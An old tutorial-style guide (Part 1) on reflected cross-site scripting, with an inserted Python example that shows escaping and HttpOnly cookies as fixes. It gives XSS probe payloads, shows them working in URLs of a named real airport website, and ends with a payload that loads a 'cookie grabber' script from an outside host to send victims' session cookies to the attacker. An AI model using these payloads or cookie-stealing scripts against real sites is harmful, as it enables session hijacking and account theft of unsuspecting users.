XSS Guide - Part 1

-------------------------------
Author: Langy
Date: 6-09-2007
Copyright: http://www.googlebig.com
-------------------------------

Links:
http://www.gnucitizen.org/xssdb/application.htm (Attack Database)
http://www.xssed.com (Mirror Archive of Vulnerable Websites)
http://ha.ckers.org/xss.html (XSS Cheat sheet)
http://software.graflex.org/dexss/ (Removing JavaScript from HTML)

http://en.wikipedia.org/wiki/Cross-site_scripting

-------------------------------

Finding an XSS-vulnerable website is not very difficult.
In most cases you can type this into the site's search box:

Code:
"><script>alert('try_xss');</script>
This script does nothing more than show an alert on the screen; if you see the alert, it means the script has been reflected into the page.

Now we try to write:

Code:
"><script>alert(document.cookie);</script>
If this XSS works, we will see an alert on the screen containing our session cookies for the site. (Putting quotes around document.cookie, as in alert('document.cookie'), would only show that literal text, not the cookies.)

If it did not run, just check the URL and see how it is generated:

- Example:

Last xss that I have discovered is on "aeroporto di Puglia" website:

http://www.seap-puglia.it/

If we search for "><script>alert('try_xss');</script> nothing happens.
But now look at the URL:

Code:
http://www.seap-puglia.it/default.as...2&strRicerca1=
%22%3E%3Cscript%3Ealert('try_xss');%3C/script%3E&strRicerca2=
&strRicerca3=&sel1=AND&sel2=AND&RicInt1=1&RicInt2=0&RicInt3=0
We find the variable that carries the search term, in this case "strRicerca1" (the search term is reflected into the URL percent-encoded: %22 is ", %3C is < and %3E is >).

Then put the alert code directly after this variable:

Code:
http://www.seap-puglia.it/default.as...tiporicerca=2&
strRicerca1="><script>alert('try_xss');</script>
The alert will magically appear.

Now we try to write:

Code:
http://www.seap-puglia.it/default.as...oricerca=2&str
Ricerca1="><script>alert(document.cookie);</script>
Perfect! We see our cookie!
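Why the search box reflects the probe, and what the site owner would change: an added example (not from the original guide) that rebuilds a minimal echo of the strRicerca1 parameter in Python, shows the raw and the entity-encoded version side by side, parses both the way a browser would, and sets the session cookie HttpOnly so document.cookie cannot read it. The cookie name sessionid and the Set-Cookie helper are assumptions, not the site's real configuration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit

# Constructed sample: the probe string the guide types into the search box.
PAYLOAD = "\"><script>alert('try_xss');</script>"

def search_term_from_url(url: str) -> str:
    """Pull the reflected parameter (strRicerca1 in the guide) out of a request URL."""
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "strRicerca1":
            return unquote(value)
    return ""

def render_search_vulnerable(term: str) -> str:
    """Reflects the raw term into an attribute value: the leading double quote closes
    the attribute, '>' closes the tag, and the rest is parsed as live markup."""
    return f'<input type="text" name="strRicerca1" value="{term}">'

def render_search_hardened(term: str) -> str:
    """Entity-encodes the term before reflecting it (quote=True also encodes " and '),
    so the browser sees text inside the attribute and never a new tag."""
    return f'<input type="text" name="strRicerca1" value="{html.escape(term, quote=True)}">'

def session_cookie_header(session_id: str) -> str:
    """HttpOnly keeps the session cookie out of document.cookie, so even a working
    injection cannot read it; Secure and SameSite limit where the browser sends it.
    The cookie name is an assumption for this example."""
    return f"Set-Cookie: sessionid={session_id}; HttpOnly; Secure; SameSite=Lax"

class _TagCollector(HTMLParser):
    """Records every start tag a browser-like parser would create from a fragment."""
    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def tags_in(markup: str) -> list:
    """Parse a fragment and return its start tags, e.g. ['input', 'script']."""
    parser = _TagCollector()
    parser.feed(markup)
    return parser.tags

if __name__ == "__main__":
    print("vulnerable:", tags_in(render_search_vulnerable(PAYLOAD)))  # ['input', 'script']
    print("hardened:  ", tags_in(render_search_hardened(PAYLOAD)))    # ['input']
```

The vulnerable rendering yields a second, live <script> element; the hardened one yields only the input, because the quote and angle brackets arrive as entities.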

At this point we need to get the victim's cookie, and this is where a "cookie grabber" comes in. A cookie grabber is a script that sits on our server and is included in the website URL, so that the victim's browser sends the cookies directly to us.


If we want to include a file with JavaScript we can write:

Code:
"><script src="http://www.googlebig.com/cookiescript.js"></script>
Inside the file "cookiescript.js" we write code that reads the cookie and sends it by e-mail.

This will be shown in the second part of the guide.